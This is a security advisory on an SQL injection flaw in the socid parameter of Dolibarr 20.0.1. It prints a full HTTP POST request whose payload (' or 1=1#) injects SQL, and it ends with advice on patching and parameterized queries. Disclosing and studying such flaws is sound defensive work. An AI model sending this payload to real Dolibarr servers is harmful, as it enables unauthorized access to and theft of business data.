Dolibarr version 20.0.1 has been identified as vulnerable to a remote SQL injection attack, as reported by cybersecurity researcher nu11secur1ty. This vulnerability allows an attacker to exploit the socid parameter to retrieve sensitive information from the MySQL database by launching an online attack from within the system.
The significance of this vulnerability is classified as medium, indicating the potential risk it poses to the security and integrity of the system. By leveraging a vulnerable security token to gain access to the web application, an attacker can execute SQL injection attacks and extract confidential data from the database.
In a simulated exploit scenario, an attacker could manipulate the socid parameter in a POST request to the Dolibarr application, injecting malicious SQL code to retrieve desired information. By crafting a specific payload containing SQL injection commands, the attacker can bypass security measures and extract sensitive data from the database remotely.
A sample exploit payload demonstrates the execution of a SQL injection attack on the Dolibarr application:
POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 357
token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status[]=0&object_status[]=1&object_status[]=2&object_status[]=3&object_status[]=4&object_status[]=5&object_status[]=6,7&object_status[]=9&year=2024&submit=RefreshThe response to the exploit payload reveals the successful execution of the SQL injection attack, as indicated by the retrieval of data from the database and potential error messages related to the manipulation of SQL syntax.
It is crucial for organizations using Dolibarr version 20.0.1 to apply security patches or updates provided by the vendor to mitigate the risk of SQL injection vulnerabilities. Additionally, implementing best practices such as input validation and parameterized queries can help prevent such attacks in the future.
In conclusion, the SQL injection vulnerability in Dolibarr version 20.0.1 highlights the importance of proactive cybersecurity measures to safeguard against potential threats and secure sensitive data stored in databases. Organizations are advised to stay informed about security vulnerabilities and take necessary actions to protect their systems from malicious exploitation.